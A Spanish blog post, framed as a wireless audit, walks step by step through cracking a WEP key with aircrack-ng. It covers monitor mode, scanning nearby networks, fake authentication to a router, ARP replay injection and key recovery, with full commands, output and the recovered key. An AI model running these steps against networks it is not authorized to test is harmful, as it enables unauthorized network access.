Auditoría Wireless con Wisacom WS-HP 800 en Ubuntu 9.10 Claves WEP

Hola a todos/as

Ya que, hace poco percibí un regalito, me puse a hacer una prueba de concepto y ha hacer una auditoría.

Lo hice contra una encriptación de nivel WEP, que, aunque ya no esté de moda, porque casi todo el mundo sabe hacerlo, me sigue sorprendiendo lo fácil que es.

EL chipset utilizado en la auditoría es RTL8187L

Aquí podemos ver que he utilizado:

Antes de empezar con la auditoría hay que hacer una  comprobaciones:

Comprobaciones

Driver Targeta

Primero de todo tenemos que comprobar si la targeta es reconocida por nuestro sistema, la mía como es por USB la comprobamos así:

marc@ubuntu:~$ lsusb |grep Realtek
Bus 002 Device 007: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

En mi caso, no he tenido problemas, me la reconoce, si esto no fuera así tendríamos que buscar drivers o utilizar ndiswrapper

Listado de Interfaces

Normalmente siempre tenemos 2 interfaces,

1. lo: Interfaz de loopback
2. eth0: Interfaz de de red LAN

Para ver una lista de las interfaces que soportan escaneo de redes Wireless lo hacemos así:

marc@ubuntu:~$ iwlist scan
lo        Interface doesn’t support scanning.

eth0      Interface doesn’t support scanning.

wmaster0  Interface doesn’t support scanning.

wlan0     Scan completed :
Cell 01 – Address: 00:19:15:AA:0C:E2
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=40/70  Signal level=-70 dBm
Encryption key:on
ESSID:”MI RED”
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
Mode:Master
Extra:tsf=00000041824689e9
Extra: Last beacon: 3597628ms ago
IE: Unknown: 000554656C6532
IE: Unknown: 010882848B962430486C
IE: Unknown: 03010B
IE: Unknown: 2A0104
IE: Unknown: 2F0104
IE: Unknown: 32040C121860
IE: Unknown: DD090010180200F4000000
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK

pan0      Interface doesn’t support scanning.

wmaster1  Interface doesn’t support scanning.

wlan1     Failed to read scan data : Network is down

Como veis yo tengo más de una interfaz:

1. lo: Interfaz de loopback
2. eth0: Interfaz de de red LAN
3. wlan0:Interfaz Wireless que uso con la targeta Wireless que tengo integrada, pero que no soporta inyección
4. pan0: Interfaz de la conexión Bluetooth
5. wlan1: Interfaz del Wisacom WS HP-800

Ahora que ya tenemos la lista de las interfaces, podemos ver que wlan1 pone que la interfaz no está activa.

Vamos a activarla con:

marc@ubuntu:~$ sudo ifconfig wlan1 up

Ahora que ya tenemos la interfaz reconocida y levantada empecemos con la auditoría.

Auditando Wireless

Modo Monitor

Antes de nada hemos de activar el modo monitor, que sirve para poder recoger los paquetes que circulan por la red.

Para activar el modo monitor hacemos:

marc@ubuntu:~$ sudo airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1010    avahi-daemon
1011    avahi-daemon
2072    wpa_supplicant
Process with PID 2072 (wpa_supplicant) is running on interface wlan0

Interface    Chipset        Driver

wlan0        Ralink 2561 PCI    rt61pci – [phy0]
wlan1        RTL8187     rtl8187 – [phy2]
(monitor mode enabled on mon0)
mon1        RTL8187     rtl8187 – [phy2]

Ahora que ya tenemos el modo monitor activado que como podéis comprobar nos crea otra interfaz llamada mon0( En mi caso )

Posibles Clientes a auditar

Ahora que ya podemos capturar paquetes vamos a ver que clientes podemos ver, para eso utilizaremos este comando:

airodump-ng start mon0

En mi caso es mon0, pero si cuando hacemos airmon-ng tuviéramos otro nombre pues otro nombre,

CH 10 ][ Elapsed: 2 mins ][ 2009-12-23 18:02

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:19:15:AA:0C:E2  -50      328     1536    0  11  54   WPA  TKIP   PSK  RED1
00:21:63:EF:C5:D0  -57      269        0    0  11  54e  WPA  TKIP   PSK  RED2
00:22:2D:44:E3:E1  -66      251       30    0   3  54e. WEP  WEP             RED3
00:1A:2B:4A:5E:79  -74       45        0    0  11  54   WEP  WEP         RED4
00:03:6F:49:11:04  -74        2        0    0  11  54   WPA  TKIP   PSK  RED5
00:1A:2B:08:27:65   -1        0        0    0 158  -1                    <length:  0>
00:1B:11:23:C2:9E  -73       12        0    0   6  54 . WEP  WEP         RED6
00:22:15:00:21:FD  -77        1        0    0   1  54   WEP  WEP         RED7
00:22:93:C0:C0:E0  -73        8        0    0   1  54   WPA  TKIP   PSK  RED8

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:19:15:AA:0C:E2  00:1C:BF:B5:51:90  -33   54 -48      0     1633  linksys,CLINEAP,Belkin_G_Plus_MIMO_ADSL,FP_STN_N,FP_STN_A,F2_TOP_F
00:19:15:AA:0C:E2  00:1A:70:B1:77:97  -22   24 -36      0        5
00:22:15:00:21:FD  00:22:43:2C:DE:B1  -74    0 - 1      0        9  RED9

Aquí veis las redes que me salen, nos interesan las del tipo WEP

Una vez hemos decidido que red queremos auditar paramos este comando con la tecla control +z y pondremos otro comando

marc@ubuntu:~$ sudo airodump-ng --channel 3 --bssid 00:22:2D:44:E3:E1 --write REDESCOGIDA mon0

Cuando ejecutas airodump-ng guardas los paquetes DATA, que son los que utilizaremos para crackear la password.

Para que no se nos haga un fichero muy grande sólo guardamos los datos de la red que nos interesa.

SI os fijáis no recogemos muchos data y eso es, porque no nos hemos asociado al router.

Autenticación al router

Para conseguir mas datos tendremos que hacerle creer al router que somos un cliente mas.

Esto se hace mediante el comando:

marc@ubuntu:~/Escritorio$ sudo aireplay-ng -1 30 -o 1 -e REDESCOGIDA -a 00:22:2D:44:E3:E1 -h 00:1A:EF:77:88:65 mon0

Con este comando nos haremos pasar por un cliente. El parámetro -a es la MAC de la Víctima y el -h la mac de nuestra tarjeta, el -e es el nombre de la red.

Cuando ejecutemos el comando nos debería de salir algo así.

17:08:35  Waiting for beacon frame (BSSID: 00:22:2D:44:E3:E1) on channel 3

17:08:35  Sending Authentication Request (Open System) [ACK]
17:08:35  Authentication successful
17:08:35  Sending Association Request [ACK]
17:08:35  Association successful (AID: 1)

Ya estamos asociados como clientes.

Ahora tenemos un problema, aunque estemos asociados como cliente, como falso cliente al router si no se genera tráfico no podremos conseguir mas paquetes data para poder crakear la contraseña. Así que si no hay tráfico lo generaremos.

Inyectando Paquetes

Para inyectar paquetes lo haremos así:

root@ubuntu:/home/marc# aireplay-ng -3 -b 00:22:2D:44:E3:E1 -h 00:1A:EF:77:88:65 mon0

Con este comando inyectamos paquetes en la red para que suban los data. Una vez hayamos conseguido autenticarnos de manera exitosa al router como cliente podremos ver como los paquetes data suben rápidamente.

17:06:38  Waiting for beacon frame (BSSID: 00:22:2D:44:E3:E1) on channel 3
Saving ARP requests in replay_arp-1223-170638.cap
You should also start airodump-ng to capture replies.
Read 2229 packets (got 87 ARP requests and 107 ACKs), sent 102 packets…(499 ppRead 2368 packets (got 127 ARP requests and 155 ACKs), sent 152 packets…(499 pRead 2513 packets (got 172 ARP requests and 204 ACKs), sent 202 packets…(499 pRead 2653 packets (got 214 ARP requests and 252 ACKs), sent 253 packets…(501 pRead 2800 packets (got 260 ARP requests and 303 ACKs), sent 302 packets…(499 pRead 2938 packets (got 309 ARP requests and 350 ACKs), sent 352 packets…(499 pRead 3081 packets (got 359 ARP requests and 402 ACKs), sent 402 packets…(499 p
Read 426419 packets (got 265265 ARP requests and 147624 ACKs), sent 148347 packets…(500 pps)

Ya podemos decir que el trabajo está echo..prácticamente.

Cuando hayamos conseguido mas o menos 15000 data podremos ejecutar:

root@ubuntu:/home/marc# aircrack-ng REDESCOGIDA.cap

El comando procesa así:

Aircrack-ng 1.0

[00:00:00] Tested 813 keys (got 126018 IVs)

KB    depth   byte(vote)
0    1/  2   37(140032) 90(139264) B8(139264) 12(137216) AD(136448) 16(136192) A1(135936) 52(135680) 7C(135680) 7B(135424) DE(135424) F1(135424)
1    6/  1   EA(136960) 9F(136192) E9(136192) 00(135936) B1(135936) B6(135680) E8(135424) 42(134912) B3(134400) 9D(134144) 04(133888) 0A(133632)
2    3/ 13   CF(139520) A9(138240) 2D(137984) 93(137984) A4(136960) 85(136704) E1(136704) 6F(136192) 01(135680) 16(135680) 0D(134912) B4(134912)
3    0/  1   F4(174336) 29(139520) 06(138752) 48(138752) BD(138496) 5B(137984) E0(137728) 80(136960) 5E(136704) C6(136192) 3A(135680) 20(135168)
4   17/  4   14(134144) E9(133888) 00(133376) 0C(133376) A8(133376) EB(133376) 99(133120) 17(132608) 5B(132608) A7(132608) F6(132608) 29(132352)

KEY FOUND! [ 33:43:39:45:34:35:34:38:46:42:42:36:32 ] (ASCII: 3C9E4548FBB62 )
Decrypted correctly: 100%

Y YA TENEMOS EL PASSWORD, jeje.

Como habies visto mediante una serie de comando se puede saber rápidamente el password de una clave WEP

El próximo paso, WPA